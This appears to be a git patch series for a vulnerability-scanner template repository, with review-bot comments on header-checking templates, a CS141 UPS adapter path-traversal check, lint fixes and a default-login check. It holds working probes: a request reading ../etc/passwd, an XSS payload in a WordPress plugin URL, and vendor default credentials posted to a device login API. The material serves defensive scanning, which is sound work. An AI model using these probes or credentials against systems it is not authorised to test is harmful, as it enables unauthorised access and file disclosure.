From 71a27da89178b90d7ad593bb04e850f691dfb04d Mon Sep 17 00:00:00 2001
From: socketz
Date: Wed, 28 Jul 2021 14:40:20 +0200
Subject: [PATCH 001/339] Added security headers templates
---
.../http-present-security-headers.yaml | 116 ++++++++++++++++++
.../http-missing-security-headers.yaml | 113 +++++++++++++++++
2 files changed, 229 insertions(+)
create mode 100644 miscellaneous/http-present-security-headers.yaml
create mode 100644 misconfiguration/http-missing-security-headers.yaml
diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml
new file mode 100644
index 0000000000..66b98f6ea2
--- /dev/null
+++ b/miscellaneous/http-present-security-headers.yaml
@@ -0,0 +1,116 @@
+id: http-present-security-headers
+
+info:
+ name: HTTP Present Security Headers
+ author: socketz
+ severity: info
+ description: It searches present security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
+ tags: config,headers
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ redirects: true
+ max-redirects: 3
+ extractors:
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Strict-Transport-Security):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-Frame-Options):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-Content-Type-Options):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Content-Security-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-Permitted-Cross-Domain-Policies):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Referrer-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Clear-Site-Data):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Cross-Origin-Embedder-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Cross-Origin-Opener-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Cross-Origin-Resource-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-XSS-Protection):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Public-Key-Pins):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Except-CT):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Feature-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Permissions-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Document-Policy):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-XSRF-TOKEN):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-CSRF-TOKEN):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(X-CSRFToken):(.*)"
+ - type: regex
+ part: header
+ group: 0
+ regex:
+ - "(?im)(Authorization):(.*)"
diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml
new file mode 100644
index 0000000000..64db558b09
--- /dev/null
+++ b/misconfiguration/http-missing-security-headers.yaml
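Review bot: The extractor pattern `"(?im)(Except-CT):(.*)"` can never match a real response, because the header is spelled `Expect-CT`; change it to `"(?im)(Expect-CT):(.*)"`. While in there, `Public-Key-Pins` and `Feature-Policy` are deprecated mechanisms, so their presence is a finding in its own right rather than evidence of a hardened server, and the `Authorization` extractor will copy any credential-bearing value a server echoes in a response header straight into scan output. Patch 010 of this series deletes the file, so this only matters if the template is revived.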
@@ -0,0 +1,113 @@
+id: http-missing-security-headers
+
+info:
+ name: HTTP Missing Security Headers
+ author: socketz
+ severity: info
+ description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
+ tags: config,headers,misconfiguration
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ redirects: true
+ max-redirects: 3
+ matchers-condition: or
+ matchers:
+ - type: word
+ name: "Strict-Transport-Security"
+ words:
+ - "Strict-Transport-Security"
+ part: header
+ negative: true
+ - type: word
+ name: "Content-Security-Policy"
+ words:
+ - "Content-Security-Policy"
+ part: header
+ negative: true
+ - type: word
+ name: "X-Frame-Options"
+ words:
+ - "X-Frame-Options"
+ part: header
+ negative: true
+ - type: word
+ name: "X-Content-Type-Options"
+ words:
+ - "X-Content-Type-Options"
+ part: header
+ negative: true
+ - type: word
+ name: "X-Permitted-Cross-Domain-Policies"
+ words:
+ - "X-Permitted-Cross-Domain-Policies"
+ part: header
+ negative: true
+ - type: word
+ name: "Referrer-Policy"
+ words:
+ - "Referrer-Policy"
+ part: header
+ negative: true
+ - type: word
+ name: "Clear-Site-Data"
+ words:
+ - "Clear-Site-Data"
+ part: header
+ negative: true
+ - type: word
+ name: "Cross-Origin-Embedder-Policy"
+ words:
+ - "Cross-Origin-Embedder-Policy"
+ part: header
+ negative: true
+ - type: word
+ name: "Cross-Origin-Opener-Policy"
+ words:
+ - "Cross-Origin-Opener-Policy"
+ part: header
+ negative: true
+ - type: word
+ name: "Cross-Origin-Resource-Policy"
+ words:
+ - "Cross-Origin-Resource-Policy"
+ part: header
+ negative: true
+ - type: word
+ name: "Access-Control-Allow-Origin"
+ words:
+ - "Access-Control-Allow-Origin"
+ part: header
+ negative: true
+ - type: word
+ name: "Access-Control-Allow-Credentials"
+ words:
+ - "Access-Control-Allow-Credentials"
+ part: header
+ negative: true
+ - type: word
+ name: "Access-Control-Expose-Headers"
+ words:
+ - "Access-Control-Expose-Headers"
+ part: header
+ negative: true
+ - type: word
+ name: "Access-Control-Max-Age"
+ words:
+ - "Access-Control-Max-Age"
+ part: header
+ negative: true
+ - type: word
+ name: "Access-Control-Allow-Methods"
+ words:
+ - "Access-Control-Allow-Methods"
+ part: header
+ negative: true
+ - type: word
+ name: "Access-Control-Allow-Headers"
+ words:
+ - "Access-Control-Allow-Headers"
+ part: header
+ negative: true
From 7d6a6c137a22acf4a797bab040e5f25d4154c05e Mon Sep 17 00:00:00 2001
From: socketz
Date: Tue, 24 Aug 2021 14:43:45 +0200
Subject: [PATCH 002/339] Added CVE-2020-11420
---
cves/2020/CVE-2020-11420.yaml | 35 +++++++++++++++++++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 cves/2020/CVE-2020-11420.yaml
diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml
new file mode 100644
index 0000000000..e418ec32b9
--- /dev/null
+++ b/cves/2020/CVE-2020-11420.yaml
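Review bot: The six `Access-Control-*` matchers turn every response without CORS headers into a "missing security header" finding, but absence is the secure default for CORS (no cross-origin read is permitted without them), so this template will flag nearly every non-CORS endpoint as misconfigured; drop those six matchers or split them into a separate informational template. `Clear-Site-Data` has the same problem: it is only meaningful on logout or session-reset responses, not on a GET of `{{BaseURL}}`. Separately, `word` matchers compare case-sensitively unless `case-insensitive: true` is set (where the engine version supports it), and HTTP/2 responses carry lowercased header names, so a server sending `strict-transport-security` would be reported as lacking HSTS. Note also that with `redirects: true` and `max-redirects: 3` the headers examined belong to the final hop, which may not be the host named by `{{BaseURL}}`.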
@@ -0,0 +1,35 @@
+id: CVE-2020-11420
+
+info:
+ name: ABB UPS Adapter CS141 – Path traversal
+ author: socketz
+ severity: medium
+ description: |
+ A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker
+ with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that
+ reference files and by doing this achieve access to files and directories outside the web root folder. An
+ attacker may access arbitrary files and directories stored in the file system, but integrity of the files are
+ not jeopardized as attacker have read access rights only. This attack is commonly known as Path
+ Traversal or Directory Traversal.
+ This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed,
+ and then you can exploit it, before that, you should wait.
+ reference: |
+ - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf
+ tags: cve,cve2020,iot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd"
+ headers:
+ - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol="
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
From 65d9d8acb297ff994b207a71876e67305ebbfcef Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 24 Aug 2021 23:13:00 +0530
Subject: [PATCH 003/339] lint fix
---
cves/2020/CVE-2020-11420.yaml | 17 ++++++++---------
1 file changed, 8 insertions(+), 9 deletions(-)
diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml
index e418ec32b9..123a068098 100644
--- a/cves/2020/CVE-2020-11420.yaml
+++ b/cves/2020/CVE-2020-11420.yaml
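Review bot: The description states that exploitation needs Admin or Engineer credentials, yet the request is a bare GET carrying only a `Referer` header and no session cookie or token, so on a device that actually enforces that login the `root:.*:0:0:` matcher can never fire and the template silently reports nothing. Either add an authentication step before this request (the CS141 default-login template later in this series posts to `/api/login` and extracts `accessToken`, which could be chained here) or, if the endpoint is reachable unauthenticated on affected firmware, say so in the description, because that materially changes the severity. The `headers:` block is also written as a list (`- Referer:`) rather than a mapping, which a later patch in the series corrects.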
@@ -5,15 +5,15 @@ info: author: socketz severity: medium description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path + A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker + with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that + reference files and by doing this achieve access to files and directories outside the web root folder. An + attacker may access arbitrary files and directories stored in the file system, but integrity of the files are + not jeopardized as attacker have read access rights only. This attack is commonly known as Path Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, + This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, and then you can exploit it, before that, you should wait. - reference: | + reference: - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf tags: cve,cve2020,iot,lfi @@ -31,5 +31,4 @@ requests: - type: regex regex: - "root:.*:0:0:" - part: body - + part: body \ No newline at end of file From 3c95101f5a205906e29ec2437f5e25d1dcba5776 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:31:27 +0530 Subject: [PATCH 004/339] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) 
diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 123a068098..7a8affbb53 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -21,8 +21,10 @@ requests: - method: GET path: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" + headers: - - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + matchers-condition: and matchers: - type: status From d705fbd84bd910dd7d064da1746cb59c2741850b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 25 Aug 2021 00:33:54 +0530 Subject: [PATCH 005/339] Update CVE-2020-11420.yaml --- cves/2020/CVE-2020-11420.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml index 7a8affbb53..be676408b1 100644 --- a/cves/2020/CVE-2020-11420.yaml +++ b/cves/2020/CVE-2020-11420.yaml @@ -23,7 +23,7 @@ requests: - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" + Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" matchers-condition: and matchers: From f290b9f60d7aa2dc8d752605b12d46f327f8f5e2 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 07:55:46 +0200 Subject: [PATCH 006/339] Deleted duplicate and in wrong directory --- cves/2020/CVE-2019-9618.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 cves/2020/CVE-2019-9618.yaml diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml deleted file mode 100644 index bc0a6e0e6d..0000000000 --- a/cves/2020/CVE-2019-9618.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: CVE-2019-9618 - -info: - name: GraceMedia Media Player 1.0 - Local File Inclusion - author: 0x_Akoko - severity: critical - reference: | - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 \ No newline at end of file From 0ef631dce102db77f5d848cc97eb3da0cbc77e7b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 25 Aug 2021 16:52:35 +0530 Subject: [PATCH 007/339] Update http-missing-security-headers.yaml --- misconfiguration/http-missing-security-headers.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 64db558b09..350fcbe9db 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -5,7 +5,7 @@ info: author: socketz severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration + tags: config,headers,misconfiguration,generic requests: - method: GET From c766a8454d24d6512ee21c793205113212ba2ded Mon Sep 17 00:00:00 2001 
From: socketz Date: Wed, 25 Aug 2021 14:09:42 +0200 Subject: [PATCH 008/339] Fixed yaml linting errors --- cves/2012/CVE-2012-1835.yaml | 10 +++++----- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-10822.yaml | 2 +- cves/2019/CVE-2019-12616.yaml | 11 +++++------ cves/2019/CVE-2019-9618.yaml | 3 ++- cves/2020/CVE-2020-7209.yaml | 11 +++++------ cves/2020/CVE-2020-8813.yaml | 2 +- cves/2020/CVE-2020-9496.yaml | 13 ++++++------- misconfiguration/java-melody-exposed.yaml | 2 +- vulnerabilities/other/mcafee-epo-rce.yaml | 2 +- .../other/netgear-router-auth-bypass.yaml | 2 +- 11 files changed, 29 insertions(+), 31 deletions(-) diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml index 9bc5c08991..d92d5b7974 100644 --- a/cves/2012/CVE-2012-1835.yaml +++ b/cves/2012/CVE-2012-1835.yaml 
@@ -11,11 +11,11 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' -# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - "{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-10818.yaml b/cves/2018/CVE-2018-10818.yaml index 2562be9725..da59c53d73 100644 --- a/cves/2018/CVE-2018-10818.yaml +++ b/cves/2018/CVE-2018-10818.yaml 
@@ -4,7 +4,7 @@ info: name: LG NAS Devices - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. + description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter. reference: | - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 17410d6679..7078f33dfc 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml 
@@ -4,7 +4,7 @@ info: name: D-Link Routers - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request. reference: | - https://www.exploit-db.com/exploits/45678 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 1c3352b08d..00eb781972 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -6,10 +6,10 @@ info: description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim. severity: medium tags: cve,cve2019,phpmyadmin,csrf - reference: | - - https://www.phpmyadmin.net/security/PMASA-2019-4/ - - https://www.exploit-db.com/exploits/46982 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + reference: + - https://www.phpmyadmin.net/security/PMASA-2019-4/ + - https://www.exploit-db.com/exploits/46982 + - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 requests: - method: GET 
@@ -18,7 +18,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "phpmyadmin.net" @@ -32,4 +31,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 # password protected diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml index 5ed8f7c7f0..b74a1b1b13 100644 --- a/cves/2019/CVE-2019-9618.yaml +++ b/cves/2019/CVE-2019-9618.yaml @@ -8,6 +8,8 @@ info: reference: | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 - https://seclists.org/fulldisclosure/2019/Mar/26 + - https://www.exploit-db.com/exploits/46537 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi requests: @@ -17,7 +19,6 @@ requests: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0" diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index 74841a4ce3..ab9f1ff023 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml 
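Review bot: In the CVE-2019-9618 hunk the two new URLs are appended under `reference: |`, which keeps all four references as one literal multi-line string, whereas the CVE-2019-12616 change in this same patch converts `reference:` into a proper YAML list; apply the same conversion here (`reference:` followed by the four `- https://...` items) so the field has one shape across templates. The `cve.mitre.org` and `nvd.nist.gov` entries both resolve to the same CVE record, so keeping just the NVD link would match what the other templates in this patch cite.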
@@ -11,12 +11,11 @@ info: http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. - # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - - # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - # vendor: https://www.hpe.com/us/en/home.html - # software: https://github.com/HewlettPackard/LinuxKI + # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. + # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. + # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + # vendor: https://www.hpe.com/us/en/home.html + # software: https://github.com/HewlettPackard/LinuxKI requests: - method: GET diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 586fc0dfb9..823b53f29c 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml 
@@ -4,7 +4,7 @@ info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability + description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: | - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index bf637b1ef7..e5f5e730c5 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -10,13 +10,12 @@ info: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - - # This template detects a Java deserialization vulnerability in Apache - # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for - # versions prior to 17.12.04. - # -- - # References: - # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + # This template detects a Java deserialization vulnerability in Apache + # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for + # versions prior to 17.12.04. + # -- + # References: + # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz requests: - raw: diff --git a/misconfiguration/java-melody-exposed.yaml b/misconfiguration/java-melody-exposed.yaml index 0139f7ec02..a2e2f0686d 100644 --- a/misconfiguration/java-melody-exposed.yaml +++ b/misconfiguration/java-melody-exposed.yaml 
@@ -4,7 +4,7 @@ info: name: JavaMelody Monitoring Exposed author: dhiyaneshDK,thomas_from_offensity severity: medium - description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a user’s session. + description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user’s session. reference: | - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security diff --git a/vulnerabilities/other/mcafee-epo-rce.yaml b/vulnerabilities/other/mcafee-epo-rce.yaml index 8524264b95..8d8f248d89 100644 --- a/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/vulnerabilities/other/mcafee-epo-rce.yaml @@ -8,7 +8,7 @@ info: A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO) is a type of Path Traversal occurring when archives are unpacked if the names of the packed files are not properly sanitized. - An attacker can create archives with files containing “../” in their names, + An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction. diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index f2d94ceba8..c558f9bfde 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml 
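Review bot: The quote normalisation in the JavaMelody description is incomplete: `"View http sessions"` now uses ASCII quotes but `user’s session` on the same line still carries a typographic apostrophe (U+2019), so the non-ASCII-punctuation issue this patch is fixing likely remains there; change it to `user's session`. Given how many descriptions in this patch mixed curly and straight quotes, a repository-wide grep for U+2018/U+2019/U+201C/U+201D would catch the rest in one pass.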
@@ -4,7 +4,7 @@ info: name: Netgear DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR decided to use to check if a page has ".jpg", ".gif" or "ess_" substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like "?.gif"). reference: | - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 From 5ae8bf50889c0a39900fe66312cde19317810441 Mon Sep 17 00:00:00 2001 From: socketz Date: Wed, 25 Aug 2021 14:32:17 +0200 Subject: [PATCH 009/339] Added CS141 SNMP template to default-logins --- default-logins/abb/cs141-default-login.yaml | 64 +++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 default-logins/abb/cs141-default-login.yaml diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml new file mode 100644 index 0000000000..25b6b8a36e --- /dev/null +++ b/default-logins/abb/cs141-default-login.yaml 
@@ -0,0 +1,64 @@
+id: cs141-default-login
+
+info:
+ name: CS141 SNMP Module Default Credentials
+ author: socketz
+ severity: medium
+ reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
+ tags: hiawatha,iot,default-login
+
+requests:
+ - raw:
+ - |
+ POST /api/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 44
+ Accept: application/json, text/plain, */*
+ Content-Type: application/json
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en,es-ES;q=0.9,es;q=0.8
+ Connection: close
+
+ {"userName":"admin","password":"cs141-snmp"}
+
+ - |
+ POST /api/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 44
+ Accept: application/json, text/plain, */*
+ Content-Type: application/json
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en,es-ES;q=0.9,es;q=0.8
+ Connection: close
+
+ {"userName":"engineer","password":"engineer"}
+
+ - |
+ POST /api/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Length: 44
+ Accept: application/json, text/plain, */*
+ Content-Type: application/json
+ Accept-Encoding: gzip, deflate
+ Accept-Language: en,es-ES;q=0.9,es;q=0.8
+ Connection: close
+
+ {"userName":"guest","password":"guest"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'accessToken'
+ - 'application/json'
+ condition: and
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: kval
+ kval:
+ - accessToken
From 35570987e0eb68170e1e129bfc6d0dd11dd99326 Mon Sep 17 00:00:00 2001
From: socketz
Date: Wed, 25 Aug 2021 14:47:28 +0200
Subject: [PATCH 010/339] Removed useless template
---
.../http-present-security-headers.yaml | 116 ------------------
1 file changed, 116 deletions(-)
delete mode 100644 miscellaneous/http-present-security-headers.yaml
diff --git a/miscellaneous/http-present-security-headers.yaml b/miscellaneous/http-present-security-headers.yaml
deleted file mode 100644
index 66b98f6ea2..0000000000
